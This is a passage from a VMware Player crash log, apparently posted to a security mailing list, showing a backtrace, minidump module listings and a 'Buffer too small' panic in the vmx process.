Mar 15 11:19:18: vmx| backtrace[11] ebp 0x0012f7e0 eip 0x005af633 params 0x08e84780 0x08f0d800 0x00000143 0000000000 [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x001ae633] (no symbol information)
Mar 15 11:19:18: vmx| backtrace[12] ebp 0x0012f804 eip 0x005b8067 params 0x08e84780 0000000000 0x00000012 0x0000000e [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x001b7067] (no symbol information)
Mar 15 11:19:18: vmx| backtrace[13] ebp 0x0012f824 eip 0x00438c3a params 0x0001390c 0x003363b4 0000000000 0x00000011 [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x00037c3a] (no symbol information)
Mar 15 11:19:18: vmx| backtrace[14] ebp 0x0012fc50 eip 0x0043a474 params 0x003363b0 0x0001390c 0x08e84780 0x08f05f88 [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x00039474] (no symbol information)
Mar 15 11:19:18: vmx| backtrace[15] ebp 0x0012fc7c eip 0x0043aa36 params 0000000000 0000000000 0000000000 0x000f4240 [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x00039a36] (no symbol information)
Mar 15 11:19:18: vmx| backtrace[16] ebp 0x0012fc94 eip 0x0043ab49 params 0000000000 0000000000 0000000000 0x08e84780 [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x00039b49] (no symbol information)
Mar 15 11:19:18: vmx| backtrace[17] ebp 0x0012fcc4 eip 0x004148b1 params 0x08e84780 0x0012fcf8 0x0015234e 0x0012fd14 [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x000138b1] (no symbol information)
Mar 15 11:19:18: vmx| backtrace[18] ebp 0x0012fd08 eip 0x00414c0a params 0x00000004 0x0071bf50 0x00152388 0000000000 [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x00013c0a] (no symbol information)
Mar 15 11:19:18: vmx| backtrace[19] ebp 0x0012ff18 eip 0x00403c56 params 0x00400000 0000000000 0x0015234b 0x0000000a [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x00002c56] (no symbol information)
Mar 15 11:19:18: vmx| backtrace[20] ebp 0x0012ffc0 eip 0x00401185 params 0000000000 0x00000030 0x7ffdf000 0xef028cf0 [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x00000185] (no symbol information)
Mar 15 11:19:18: vmx| backtrace[21] ebp 0x0012fff0 eip 0x77e814c7 params 0x00401000 0000000000 0x78746341 0x00000020 [C:\WINDOWS\system32\kernel32.dll base 0x77e60000 0x0001:0x000204c7] (GetCurrentDirectoryW + 0x0044)
Mar 15 11:19:18: vmx| ----End of backtrace----
Mar 15 11:19:18: vmx| Win32 object usage: GDI 6, USER 2
Mar 15 11:19:18: vmx| W32Util_CoreDump: faking exception to get context
Mar 15 11:19:18: vmx| CoreDump: Writing minidump to C:\Documents and Settings\n00b\Application Data\VMware\vmware-vmx-1372.dmp
Mar 15 11:19:18: vmx| CoreDump: including module base 0x00400000 size 0x004fc000
Mar 15 11:19:18: vmx|   checksum 0x00000000 timestamp 0x43a85b9f
Mar 15 11:19:18: vmx|   image file C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe
Mar 15 11:19:18: vmx|   file version 1.0.1.19317
Mar 15 11:19:18: vmx| CoreDump: including module base 0x77f50000 size 0x000a7000
Mar 15 11:19:18: vmx|   checksum 0x000a92f6 timestamp 0x3d6dfa28
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\ntdll.dll
Mar 15 11:19:18: vmx|   file version 5.1.2600.1106
Mar 15 11:19:18: vmx| CoreDump: including module base 0x77e60000 size 0x000e6000
Mar 15 11:19:18: vmx|   checksum 0x000e7ed3 timestamp 0x3d6dfa28
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\kernel32.dll
Mar 15 11:19:18: vmx|   file version 5.1.2600.1106
Mar 15 11:19:18: vmx| CoreDump: including module base 0x7c340000 size 0x00056000
Mar 15 11:19:18: vmx|   checksum 0x0005f1e9 timestamp 0x3e561eac
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\msvcr71.dll
Mar 15 11:19:18: vmx|   file version 7.10.3052.4
Mar 15 11:19:18: vmx| CoreDump: including module base 0x77d40000 size 0x0008c000
Mar 15 11:19:18: vmx|   checksum 0x000936bc timestamp 0x3d6dfa28
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\user32.dll
Mar 15 11:19:18: vmx|   file version 5.1.2600.1106
Mar 15 11:19:18: vmx| CoreDump: including module base 0x77c70000 size 0x00040000
Mar 15 11:19:18: vmx|   checksum 0x0004285c timestamp 0x3d6dfa27
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\gdi32.dll
Mar 15 11:19:18: vmx|   file version 5.1.2600.1106
Mar 15 11:19:18: vmx| CoreDump: including module base 0x77dd0000 size 0x0008d000
Mar 15 11:19:18: vmx|   checksum 0x0009315e timestamp 0x3d6dfa28
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\advapi32.dll
Mar 15 11:19:18: vmx|   file version 5.1.2600.1106
Mar 15 11:19:18: vmx| CoreDump: including module base 0x78000000 size 0x00086000
Mar 15 11:19:18: vmx|   checksum 0x00084e46 timestamp 0x3d6dfa29
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\rpcrt4.dll
Mar 15 11:19:18: vmx|   file version 5.1.2600.1106
Mar 15 11:19:18: vmx| CoreDump: including module base 0x771b0000 size 0x00121000
Mar 15 11:19:18: vmx|   checksum 0x00121e6b timestamp 0x3d6dfa22
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\ole32.dll
Mar 15 11:19:18: vmx|   file version 5.1.2600.1106
Mar 15 11:19:18: vmx| CoreDump: including module base 0x74ae0000 size 0x00007000
Mar 15 11:19:18: vmx|   checksum 0x00009968 timestamp 0x3b7dfe1f
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\cfgmgr32.dll
Mar 15 11:19:18: vmx|   file version 5.1.2600.0
Mar 15 11:19:18: vmx| CoreDump: including module base 0x76670000 size 0x000e7000
Mar 15 11:19:18: vmx|   checksum 0x000e58ec timestamp 0x3d6dfa1e
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\setupapi.dll
Mar 15 11:19:18: vmx|   file version 5.1.2600.1106
Mar 15 11:19:18: vmx| CoreDump: including module base 0x77c10000 size 0x00053000
Mar 15 11:19:18: vmx|   checksum 0x000520bc timestamp 0x3d6dfa27
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\msvcrt.dll
Mar 15 11:19:18: vmx|   file version 7.0.2600.1106
Mar 15 11:19:18: vmx| CoreDump: including module base 0x71ab0000 size 0x00015000
Mar 15 11:19:18: vmx|   checksum 0x00015647 timestamp 0x3b7dfe31
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\ws2_32.dll
Mar 15 11:19:18: vmx|   file version 5.1.2600.0
Mar 15 11:19:18: vmx| CoreDump: including module base 0x71aa0000 size 0x00008000
Mar 15 11:19:18: vmx|   checksum 0x0000fcb0 timestamp 0x3b7dfe32
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\ws2help.dll
Mar 15 11:19:18: vmx|   file version 5.1.2600.0
Mar 15 11:19:18: vmx| CoreDump: including module base 0x77120000 size 0x0008b000
Mar 15 11:19:18: vmx|   checksum 0x000999af timestamp 0x3d6dfa22
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\oleaut32.dll
Mar 15 11:19:18: vmx|   file version 3.50.5016.0
Mar 15 11:19:18: vmx| CoreDump: including module base 0x72280000 size 0x00028000
Mar 15 11:19:18: vmx|   checksum 0x00026e12 timestamp 0x3d6dfa07
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\dinput.dll
Mar 15 11:19:18: vmx|   file version 5.1.2600.1106
Mar 15 11:19:18: vmx| CoreDump: including module base 0x76b40000 size 0x0002c000
Mar 15 11:19:18: vmx|   checksum 0x0002f7cc timestamp 0x3d6dfa20
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\winmm.dll
Mar 15 11:19:18: vmx|   file version 5.1.2600.1106
Mar 15 11:19:18: vmx| CoreDump: including module base 0x51080000 size 0x00061000
Mar 15 11:19:18: vmx|   checksum 0x0006c940 timestamp 0x40ee6b7c
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\dsound.dll
Mar 15 11:19:18: vmx|   file version 5.3.1.904
Mar 15 11:19:18: vmx| CoreDump: including module base 0x77c00000 size 0x00007000
Mar 15 11:19:18: vmx|   checksum 0x00005468 timestamp 0x3b7dfe0f
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\version.dll
Mar 15 11:19:18: vmx|   file version 5.1.2600.0
Mar 15 11:19:18: vmx| CoreDump: including module base 0x5ed00000 size 0x000c6000
Mar 15 11:19:18: vmx|   checksum 0x000ace46 timestamp 0x3d6df9e5
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\opengl32.dll
Mar 15 11:19:18: vmx|   file version 5.1.2600.1106
Mar 15 11:19:18: vmx| CoreDump: including module base 0x68b20000 size 0x0001e000
Mar 15 11:19:18: vmx|   checksum 0x00025e60 timestamp 0x3b7dfe60
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\glu32.dll
Mar 15 11:19:18: vmx|   file version 5.1.2600.0
Mar 15 11:19:18: vmx| CoreDump: including module base 0x51000000 size 0x00050000
Mar 15 11:19:18: vmx|   checksum 0x00053d78 timestamp 0x40ee6af9
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\ddraw.dll
Mar 15 11:19:18: vmx|   file version 5.3.1.904
Mar 15 11:19:18: vmx| CoreDump: including module base 0x73bc0000 size 0x00006000
Mar 15 11:19:18: vmx|   checksum 0x0000e03d timestamp 0x3b7dfe25
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\dciman32.dll
Mar 15 11:19:18: vmx|   file version 5.1.2600.0
Mar 15 11:19:18: vmx| CoreDump: including module base 0x76380000 size 0x00005000
Mar 15 11:19:18: vmx|   checksum 0x00006ca4 timestamp 0x3d6dfa1d
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\msimg32.dll
Mar 15 11:19:18: vmx|   file version 5.1.2600.1106
Mar 15 11:19:18: vmx| CoreDump: including module base 0x690d0000 size 0x0000d000
Mar 15 11:19:18: vmx|   checksum 0x00000000 timestamp 0x43a85ad6
Mar 15 11:19:18: vmx|   image file C:\Program Files\VMware\VMware Player\bin\ntwrap.dll
Mar 15 11:19:18: vmx|   file version 1.0.1.19317
Mar 15 11:19:18: vmx| CoreDump: including module base 0x76780000 size 0x00008000
Mar 15 11:19:18: vmx|   checksum 0x00008475 timestamp 0x3d6dfa1e
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\shfolder.dll
Mar 15 11:19:18: vmx|   file version 6.0.2800.1106
Mar 15 11:19:18: vmx| CoreDump: including module base 0x70a70000 size 0x00064000
Mar 15 11:19:18: vmx|   checksum 0x000690c8 timestamp 0x3d6dfa02
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\shlwapi.dll
Mar 15 11:19:18: vmx|   file version 6.0.2800.1106
Mar 15 11:19:18: vmx| CoreDump: including module base 0x71950000 size 0x000e4000
Mar 15 11:19:18: vmx|   checksum 0x000ea784 timestamp 0x3d6df9b6
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.10.0_x-ww_f7fb5805\comctl32.dll
Mar 15 11:19:18: vmx|   file version 6.0.2800.1106
Mar 15 11:19:18: vmx| CoreDump: including module base 0x76f90000 size 0x00010000
Mar 15 11:19:18: vmx|   checksum 0x00016fca timestamp 0x3d6dfa22
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\secur32.dll
Mar 15 11:19:18: vmx|   file version 5.1.2600.1106
Mar 15 11:19:18: vmx| CoreDump: including module base 0x76ce0000 size 0x0001f000
Mar 15 11:19:18: vmx|   checksum 0x0002a43b timestamp 0x3d6dfa21
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\ntmarta.dll
Mar 15 11:19:18: vmx|   file version 5.1.2600.1106
Mar 15 11:19:18: vmx| CoreDump: including module base 0x76f60000 size 0x0002c000
Mar 15 11:19:18: vmx|   checksum 0x0002d4fa timestamp 0x3d6dfa22
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\wldap32.dll
Mar 15 11:19:18: vmx|   file version 5.1.2600.1106
Mar 15 11:19:18: vmx| CoreDump: including module base 0x71bf0000 size 0x00011000
Mar 15 11:19:18: vmx|   checksum 0x0000f455 timestamp 0x3d6dfa06
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\samlib.dll
Mar 15 11:19:18: vmx|   file version 5.1.2600.1106
Mar 15 11:19:18: vmx| CoreDump: including module base 0x76fd0000 size 0x00078000
Mar 15 11:19:18: vmx|   checksum 0x0007d6dd timestamp 0x3b7dfe10
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\clbcatq.dll
Mar 15 11:19:18: vmx|   file version 2001.12.4414.42
Mar 15 11:19:18: vmx| CoreDump: including module base 0x77050000 size 0x000c5000
Mar 15 11:19:18: vmx|   checksum 0x000cd4c3 timestamp 0x3b7dfe10
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\comres.dll
Mar 15 11:19:18: vmx|   file version 2001.12.4414.42
Mar 15 11:19:18: vmx| CoreDump: including module base 0x74ef0000 size 0x0000a000
Mar 15 11:19:18: vmx|   checksum 0x000084f7 timestamp 0x3d6dfa14
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\wbem\wbemprox.dll
Mar 15 11:19:18: vmx|   file version 5.1.2600.1106
Mar 15 11:19:18: vmx| CoreDump: including module base 0x75290000 size 0x00038000
Mar 15 11:19:18: vmx|   checksum 0x0003b6a7 timestamp 0x3d6dfa15
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\wbem\wbemcomn.dll
Mar 15 11:19:18: vmx|   file version 5.1.2600.1106
Mar 15 11:19:18: vmx| CoreDump: including module base 0x74ed0000 size 0x0000f000
Mar 15 11:19:18: vmx|   checksum 0x0001a622 timestamp 0x3b7dfe1d
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\wbem\wbemsvc.dll
Mar 15 11:19:18: vmx|   file version 5.1.2600.0
Mar 15 11:19:18: vmx| CoreDump: including module base 0x75690000 size 0x0008d000
Mar 15 11:19:18: vmx|   checksum 0x00099607 timestamp 0x3d6dfa17
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\wbem\fastprox.dll
Mar 15 11:19:18: vmx|   file version 5.1.2600.1106
Mar 15 11:19:18: vmx| CoreDump: including module base 0x0ffd0000 size 0x00023000
Mar 15 11:19:18: vmx|   checksum 0x0002a11c timestamp 0x3ccdcab0
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\rsaenh.dll
Mar 15 11:19:18: vmx|   file version 5.1.2600.1029
Mar 15 11:19:18: vmx| CoreDump: including module base 0x72d20000 size 0x00009000
Mar 15 11:19:18: vmx|   checksum 0x00007ea6 timestamp 0x3b7dfe2a
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\wdmaud.drv
Mar 15 11:19:18: vmx|   file version 5.1.2600.0
Mar 15 11:19:18: vmx| CoreDump: including module base 0x72d10000 size 0x00008000
Mar 15 11:19:18: vmx|   checksum 0x00005557 timestamp 0x3b7dfe2a
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\msacm32.drv
Mar 15 11:19:18: vmx|   file version 5.1.2600.0
Mar 15 11:19:18: vmx| CoreDump: including module base 0x77be0000 size 0x00014000
Mar 15 11:19:18: vmx|   checksum 0x0001695e timestamp 0x3b7dfe0f
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\msacm32.dll
Mar 15 11:19:18: vmx|   file version 5.1.2600.0
Mar 15 11:19:18: vmx| CoreDump: including module base 0x77bd0000 size 0x00007000
Mar 15 11:19:18: vmx|   checksum 0x0000a3bf timestamp 0x3b7dfe0f
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\midimap.dll
Mar 15 11:19:18: vmx|   file version 5.1.2600.0
Mar 15 11:19:18: vmx| CoreDump: including module base 0x0b280000 size 0x000c1000
Mar 15 11:19:18: vmx|   checksum 0x000bd9f7 timestamp 0x3e385156
Mar 15 11:19:18: vmx|   image file C:\Program Files\VMware\VMware Player\dbghelp.dll
Mar 15 11:19:18: vmx|   file version 6.1.17.2
Mar 15 11:19:18: vmx| CoreDump: including module base 0x76bf0000 size 0x0000b000
Mar 15 11:19:18: vmx|   checksum 0x0000fb5a timestamp 0x3d6dfa21
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\psapi.dll
Mar 15 11:19:18: vmx|   file version 5.1.2600.1106
Mar 15 11:19:18: vmx| CoreDump: Including thread 3012
Mar 15 11:19:18: vmx| CoreDump: Including thread 3788
Mar 15 11:19:18: vmx| CoreDump: Including thread 2092
Mar 15 11:19:18: vmx| CoreDump: Including thread 1440
Mar 15 11:19:18: vmx| CoreDump: Including thread 2088
Mar 15 11:19:18: vmx| CoreDump: Including thread 2224
Mar 15 11:19:18: vmx| CoreDump: Including thread 3780
Mar 15 11:19:18: vmx| CoreDump: Including thread 1704
Mar 15 11:19:18: vmx| CoreDump: Including thread 192
Mar 15 11:19:18: vmx| Msg_Post: Error
Mar 15 11:19:18: vmx| [msg.log.error.unrecoverable] VMware Player unrecoverable error: (vmx)
Mar 15 11:19:18: vmx| C:/ob/bora-19317/bora/lib/string/str.c:192 Buffer too small 0x430f6f
Mar 15 11:19:18: vmx| [msg.panic.haveLog] A log file is available in "C:\Documents and Settings\n00b\Desktop\back-track\vmware.log".  [msg.panic.haveCore] A core file is available in "C:\Documents and Settings\n00b\Application Data\VMware\vmware-vmx-1372.dmp".  [msg.panic.requestSupport.withLogAndCore] Please request support and include the contents of the log file and core file.  [msg.panic.requestSupport.win32] 
Mar 15 11:19:18: vmx| To collect files to submit to VMware support, run cscript vm-support.vbs.
Mar 15 11:19:18: vmx| [msg.panic.response] We will respond on the basis of your support entitlement
 

[/code]
 
 


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ